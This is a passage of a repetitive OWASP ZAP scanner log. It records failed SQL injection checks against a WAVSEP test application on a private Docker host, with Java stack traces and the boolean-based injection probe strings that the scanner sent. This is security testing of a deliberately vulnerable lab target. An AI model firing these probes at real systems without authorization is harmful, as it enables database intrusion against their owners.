org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682005 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6988=1066] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6988=1066 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682006 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3765=1565] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3765=1565 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682006 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 6491=5233 AND ('LogJ'='LogJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 6491=5233 AND ('LogJ'='LogJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682007 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 6751=6751 AND ('cXlN'='cXlN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 6751=6751 AND ('cXlN'='cXlN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682007 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3744=4169 AND ('IUSm'='IUSm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3744=4169 AND ('IUSm'='IUSm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682008 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 4845=4845 AND ('PjOB'='PjOB] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 4845=4845 AND ('PjOB'='PjOB at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682008 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 6491=5233 AND ('LogJ'='LogJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 6491=5233 AND ('LogJ'='LogJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682010 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3744=4169 AND ('IUSm'='IUSm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3744=4169 AND ('IUSm'='IUSm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682010 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8778=5323 AND 'CdXC'='CdXC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 8778=5323 AND 'CdXC'='CdXC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682011 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 4987=4987 AND 'QZUL'='QZUL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 4987=4987 AND 'QZUL'='QZUL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682011 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1618=2117 AND 'aFxy'='aFxy] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1618=2117 AND 'aFxy'='aFxy at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682013 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8778=5323 AND 'CdXC'='CdXC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 8778=5323 AND 'CdXC'='CdXC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682014 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 7394=7394 AND 'vgJP'='vgJP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 7394=7394 AND 'vgJP'='vgJP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682014 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 5534=4519 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 5534=4519 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682015 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 8813=8813 AND '%'='] due to an 